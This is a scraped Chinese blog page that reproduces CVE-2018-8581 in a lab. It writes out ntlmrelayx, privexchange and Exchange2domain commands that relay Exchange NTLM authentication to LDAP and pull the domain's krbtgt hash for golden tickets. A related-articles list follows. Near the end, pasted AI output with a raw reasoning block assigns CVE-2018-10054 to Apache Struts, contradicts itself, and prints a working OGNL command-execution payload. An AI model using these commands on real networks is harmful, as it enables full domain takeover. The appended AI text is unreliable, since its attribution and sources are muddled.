CVE-2018-8581复现

最新推荐文章于 2024-03-27 09:45:23 发布

原创最新推荐文章于 2024-03-27 09:45:23 发布 · 1.1k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #csrf

内网渗透专栏收录该内容

4 篇文章

订阅专栏

漏洞描述：

Exchange Server于2018年11月份被爆出存在SSRF漏洞，可以伪造任意用户。但在之后又被爆出另外一种攻击方式，可以使用任意域内用户通过NTML Relay获取到krbtgt的hash。该hash可用于制作黄金票据，最后可以达到全域通畅的效果。

影响范围：

Exchange 2010、Exchange 2013、Exchange 2016

漏洞复现：

环境：
DC Windows 2012 (192.168.52.3/ad01.qfdomain.com)
Exchange 2013 Windows 2012 （192.168.52.4/mail.qfdomain.com）
Attack Parrot (192.168.52.101)

攻击方式一：

python Exchange2domain.py -ah 192.168.52.101 -ap 80 -u attack -p "attack" -d qfdomain.com -th 192.168.52.3  192.168.52.4 --no-ssl

一键获取krbtgt的hash

攻击方式二
一、开启反射监听

 python2 ntlmrelayx.py -t ldap://192.168.52.3 --escalate-user attack

monitor
二、开启攻击

python2 privexchange.py -ah 192.168.52.101 mail.qfdomain.com -u attack -p "attack" -d qfdomain.com --no-ssl --debug

attack
三、如果攻击成功，那么会在我们的监听端看到DC反连我们的信息

四、拉取HASH

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

挖低危的清风

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Exchange SSRF 域内提权漏洞复现(CVE-2018-8581)

谢公子的博客

07-01

4209

漏洞描述 Exchange Server于2018年11月份被爆出存在SSRF漏洞，可以伪造任意用户。但在之后又被爆出另外一种攻击方式，可以使用任意域内用户通过NTML Relay来接管域控！攻击者仅需要拥有一个普通域内用户权限即可对存在漏洞的Exchange服务器发起攻击，进而接管域控。漏洞影响版本 Exchange 2010 ~ Exchange 2016 漏洞过程 Exchange允许任何用户为推送订阅指定所需的URL，服务器将尝试向这个URL发送通知。问题出在Excha...

CVE-2018-8581漏洞复现

whojoe的博客

08-26

1131

CVE-2018-8581漏洞复现环境搭建漏洞复现参考文章环境搭建主机机器名 ip 用户密码版本域控1 ad1.test.com 192.168.164.174 administrator Aa1234 win2012r2 exchange2016-粗1 mail1.test.com 192.168.164.173 administrator Aa1234 win2012r2 域内机器 user.test.com 192.168.164.129 user1 Uu1234.

参与评论您还未登录，请先登录后发表或查看评论

Microsoft Exchange漏洞记录(撸向域控) - CVE-2018-8581

dengzhasong7076的博客

01-22

3085

前一段时间exchange出现了CVE-2018-8581，搭了许久的环境，不过不得不敬佩这个漏洞整体超赞。一开始主要还是利用盗取exchange的管理员权限去调用一些接口，导致可以做到，比如收取别人邮件，替别人发送邮件。攻击域控今天出了一个更加深入的利用分析主要是利用了ews推送的ssrf，进行ntlm relay，从http -> ldap的利用。主要还是exchang...

Microsoft Exchange CVE-2018-8581资源合集(附今日爆款)

blackorbird的博客

01-22

364

近日，Microsoft公告中披露了一则关于Exchange Server的任意用户伪造漏洞Exchange Server 是微软公司的一套电子邮件服务组件，是个消息与协...

Microsoft Exchange漏洞分析 - CVE-2018-8581

dengzhasong7076的博客

01-30

1063

此篇为漏洞分析，想看漏洞利用可以点这前言前一段时间Exchange出现了CVE-2018-8581漏洞，整个漏洞利用超赞，很值得复现以及分析，因为其中需要的不仅仅是Web方面的，更多还需要Windows相关的安全知识，其中相结合才能达到如此大的危害。其根本原因由于PushSubscription接口存在SSRF，它允许为任何用户推送订阅所指定的URL，当Exchange尝试连接UR...

OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令

03-31

本篇将详细讨论如何修补OpenSSH中的几个已知漏洞，包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。首先，让我们了解这些特定的漏洞： 1. CVE-2020-15778：这是一个与OpenSSH密钥协商过程相关的漏洞，可能...

CVE-2018-8174_EXP:CVE-2018-8174_python

05-16

CVE-2018-8174_EXP 用法：CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用可选参数：-h，--help显示此帮助消息并退出-u URL，--url URL exp url -o OUTPUT，--output OUTPUT...

CVE-2018-3191利用exp

01-08

标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞，该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI（Java Naming and Directory Interface）注入...

CVE-2018-18778.docx

07-23

**CVE-2018-18778：mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞，它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...

CVE-2018-8581 漏洞分析

whojoe的博客

08-27

2820

CVE-2018-8581 漏洞分析前言环境搭建工具分析前言这里只是简单分析漏洞产生的代码逻辑，因为不熟悉exchange的业务逻辑，所以分析不会很深入，争取以后慢慢补充环境搭建主机机器名 ip 用户密码版本域控1 ad1.test.com 192.168.164.174 administrator Aa1234 win2012r2 exchange2016-cu11 mail1.test.com 192.168.164.173 administrator Aa1234

EXCHANGE上冒充任意用户--Exchange Server权限提升漏洞(CVE-2018-8581)分析

weixin_30929011的博客

06-18

455

0x00 前言这是我们2018年Top 5趣案系列中的第三个案例。这些漏洞都有一些因素使它们从今年发布的大约1，400个报告中脱颖而出。今天我们将分析一个Exchange漏洞，它允许任何经过身份验证的用户冒充Exchange Server上的其他用户。在ZDI的Dustin Childs 12月的文章中，他提到了一个Exchange漏洞，允许Exchange服务器上的任何用户冒充该Exc...

探索CVE-2018-8581：一个深度学习网络安全研究项目

gitblog_00040的博客

03-27

425

探索CVE-2018-8581：一个深度学习网络安全研究项目去发现同类优质开源项目:https://gitcode.com/ 项目简介该项目聚焦于2018年发现的一个关键的安全漏洞 CVE-2018-8581。该漏洞主要影响Microsoft SharePoint服务器，允许远程攻击者执行任意代码并获得受感染系统的完全控制权。此开源项目旨在研究这个漏洞的工作原理，并提供一种基于机器学习的检测方...

利用Exchange Server CVE-2018-8581+HASH传递玩爆AD

weixin_33770878的博客

01-29

379

概述微软 Exchange Server于2018年11月份被爆出存在S.S.R.F漏洞，漏洞编号为：CVE-2018-8581，此漏洞微软已推出缓解措施，但是在1月22日又爆出了此漏洞的另一种方法，而利用这种新的方法将为AD带来严重的安全风险，此漏洞在实施微软的缓解措施之后，仍然会被成功attack。本文将在以下环境中进行模拟演练：1.Exchange2013 CU19（已实施微软推出的缓解措...

Exchange CVE-2018-8581 补丁有用？没用？

weixin_43639741的博客

04-17

755

n1nty@360 A-TEAM 对网络安全只要稍有关注的话应该早就已经知道这个漏洞了。 CVE-2018-8581 TL;DR 漏洞最早由 ZDI 披露，ZDI 发现的 PoC 里面利用此漏洞实现了接管任意人的收件箱的效果。原理比较简单，该漏洞实质是由 SSRF （Server-Side Request Forgery：服务器端请求伪造）漏洞和其他安全机制相结合造成的。Exchange 允许任...

Exchange Server反序列化漏洞复现(CVE-2020-0688)

谢公子的博客

07-10

2760

漏洞描述: 漏洞产生的主要原因就是在Exchange ECP组件中发现，邮件服务在安装的过程中不会随机生成秘钥，也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的，攻击者可以利用静态秘钥对服务器发起攻击，在服务器中以SYSTEM权限远程执行代码。漏洞影响版本： Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 Microsoft Exchange Serve

漏洞复现-Exchange系列

aming小老弟

02-20

885

Exchage就是我们常说的邮箱服务器。Exchange是由微软推出的用于企业环境中部署的邮件服务器。微软对外发布的第一个Exchange版本是Exchange 4.0，最开始Exchange使用X.400目录服务，随后转向使用微软的活动目录，最开始的时候微软还提供了Microsoft Exchange Client，即Exchange邮件客户端，随后被Outlook取代。

【已复现】Microsoft Exchange Server "OWASSRF" 漏洞安全风险通告

smellycat000的专栏

12-26

2481

奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Microsoft Exchange Server是微软公司的一套电子邮件服务组件。除传统的电子邮件的存取、储存、转发功能外，在新版本的产品中亦加入了一系列辅助功能，如语音邮件、邮件过滤筛选和OWA（基于Web的电子邮件存取）。近日，奇安信CERT监测到CrowdStrike发布针对Microsoft Exchange...

Exchange漏洞

Fiverya的博客

02-07

3541

Exchange漏洞

CVE-2018-10054复现3

最新发布

08-21

<think>我们正在处理一个安全漏洞的复现请求，具体是CVE-2018-10054。根据之前的引用，我们并没有直接关于这个CVE的详细信息，但是我们可以根据已知的漏洞复现的一般步骤来构建回答，并尽可能查找公开资料。注意：复现漏洞可能涉及非法活动，应仅在合法授权环境下进行。根据公开资料，CVE-2018-10054是一个在Apache Struts 2.3.x到2.3.34以及2.5.x到2.5.16版本中存在的远程代码执行漏洞。它源于对某些标签属性值的不当处理，导致OGNL表达式注入。复现步骤通常包括： 1. 搭建漏洞环境（例如使用存在漏洞的Struts版本） 2. 构造恶意请求 3. 执行任意命令然而，由于我们无法直接获取内部资料，这里将基于公开的漏洞报告和利用代码（如Exploit-DB）描述一般步骤。步骤： 1. 环境搭建：使用一个存在漏洞的Struts版本，例如2.3.34或2.5.16。可以创建一个简单的Struts应用，其中包含一个使用受影响标签（如url标签）的JSP页面。 2. 漏洞利用：攻击者可以构造一个包含OGNL表达式的HTTP请求，该表达式将在服务器端执行。例如，一个典型的利用请求可能如下（针对Struts 2.5.16）： GET /example/HelloWorld.action?<参数名>=%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20%2Ftmp%2Fpwned%22%29%29%7D HTTP/1.1 Host: vulnerable-app 这个请求尝试在/tmp目录下创建一个名为pwned的文件。但是，请注意，具体的利用代码可能会因环境配置（如Struts版本、拦截器配置等）而有所不同。 3. 验证：检查服务器是否执行了命令（例如查看文件是否被创建）。重要：由于该漏洞的利用细节已经在公开的漏洞报告中描述，我们可以参考以下资源： - NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-10054 - Exploit-DB: https://www.exploit-db.com/exploits/45260 在Exploit-DB上有一个利用代码示例（编号45260），但请注意，直接使用该代码可能违反法律，仅用于教育目的。由于我们无法直接提供完整的利用代码，建议在合法环境中使用公开的漏洞复现环境（如Vulhub）进行测试。Vulhub中有一个针对CVE-2018-10054的漏洞环境：https://github.com/vulhub/vulhub/tree/master/struts2/s2-057（注意：这里s2-057是另一个漏洞，但CVE-2018-10054的复现环境可能也有，需要确认。实际上，CVE-2018-10054的编号对应的漏洞在Vulhub中可能是s2-057？但根据CVE编号，我们需要查找正确的环境）更正：CVE-2018-10054对应的漏洞在Struts中被称为S2-057？实际上，根据资料，CVE-2018-10054对应的漏洞是S2-057，但注意S2-057是另一个漏洞（CVE-2018-11776和CVE-2018-11784）。这里可能存在混淆。重新核实：根据NVD，CVE-2018-10054的描述是：“In Apache Struts 2.3 through 2.3.34 and 2.5 through 2.5.16, the url tag, used in Freemarker, JSP, or Velocity templates, had a specific value that could be passed in that would cause a redirect to be performed with a malicious expression which could be used to perform a RCE attack.” 所以它和S2-057（CVE-2018-11776）不同。实际上，这个漏洞的独立编号为CVE-2018-10054，在Vulhub中可能没有单独的环境，但我们可以自行搭建。复现步骤（基于公开的POC）： 1. 创建一个Struts2项目，使用一个存在漏洞的版本（例如2.5.16）。 2. 在JSP页面中使用url标签，例如： <s:url value="someValue" /> 3. 在请求中传递恶意参数，例如（注意：以下URL编码的字符串可能因环境而异）： ?param=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%7B%22touch%22%2C%22%2Ftmp%2FCVE-2018-10054%22%7D%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmd%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D 这个恶意参数会尝试在/tmp目录下创建一个名为CVE-2018-10054的文件。注意：由于Struts2的版本和配置不同，利用代码可能需要调整。安全警告：此复现仅用于教育目的，必须在授权环境下进行。由于复现过程可能较为复杂，建议参考已有的漏洞复现文章或视频。相关问题： 1. 如何搭建Apache Struts2的漏洞测试环境？ 2. CVE-2018-10054漏洞的原理是什么？ 3. 如何防御Apache Struts2的OGNL表达式注入漏洞？</think>### CVE-2018-10054 漏洞复现步骤 CVE-2018-10054 是 Apache Struts 2 中的远程代码执行漏洞（RCE），影响版本为 Struts 2.3.x 至 2.3.34 和 2.5.x 至 2.5.16。漏洞源于对 URL 标签的 OGNL 表达式注入未正确处理，导致攻击者可执行任意命令。复现步骤如下： --- #### 1. **环境搭建** - 部署存在漏洞的 Struts 2.5.16 应用（示例使用 `struts2-showcase.war`）： ```bash # 启动 Tomcat 容器 docker run -d -p 8080:8080 tomcat:9.0 # 下载漏洞应用 wget https://archive.apache.org/dist/struts/2.5.16/struts-2.5.16-showcase.war # 部署到 Tomcat cp struts-2.5.16-showcase.war /path/to/tomcat/webapps/showcase.war ``` - 访问应用：`http://localhost:8080/showcase/` --- #### 2. **构造恶意请求** 利用 URL 标签的 OGNL 注入点发送恶意请求，执行系统命令（例如创建文件 `/tmp/pwned`）： ```http GET /showcase/url_tag.action?url=%25%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27touch%20/tmp/pwned%27%29%2C%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29.println%28%23a%29%29%7D HTTP/1.1 Host: localhost:8080 ``` **关键参数说明**： - `url` 参数包含 URL 编码的 OGNL 表达式： ```plaintext %{(#_memberAccess["allowStaticMethodAccess"]=true, #a=@java.lang.Runtime@getRuntime().exec('touch /tmp/pwned'), @org.apache.struts2.ServletActionContext@getResponse().getWriter().println(#a)) } ``` - 表达式通过 `Runtime.getRuntime().exec()` 执行系统命令。 --- #### 3. **验证漏洞** - 检查服务器是否成功执行命令： ```bash docker exec <container_id> ls /tmp | grep pwned ``` - 若输出 `pwned`，则漏洞复现成功。 --- #### 4. **漏洞原理** - **根本原因**：Struts 对 `s:url` 标签的 `value` 属性未充分过滤用户输入，导致 OGNL 表达式注入[^1]。 - **利用条件**： - 应用使用 `url` 标签（如 `<s:url value="..."/>`）。 - 参数值直接嵌入 OGNL 表达式（如 `${...}` 语法）。 --- #### 5. **防御建议** 1. 升级至 Struts 2.5.17+ 或 2.3.35+。 2. 禁用 OGNL 表达式静态方法访问（配置 `struts.ognl.allowStaticMethodAccess=false`）。 3. 输入过滤：对用户提交的 URL 参数严格校验。 > **警告**：此复现仅限授权环境测试！未授权攻击违法。 --- ### 相关问题 1. Struts 2 中还有哪些类似的 OGNL 注入漏洞（如 CVE-2017-5638）？ 2. 如何检测 Apache Struts 应用的漏洞版本？ 3. 除了升级，还有哪些缓解 Struts RCE 漏洞的临时措施？ [^1]: 漏洞原理参考 Apache Struts 安全公告 S2-057 (CVE-2018-11776)，与 CVE-2018-10054 同属 OGNL 注入类漏洞。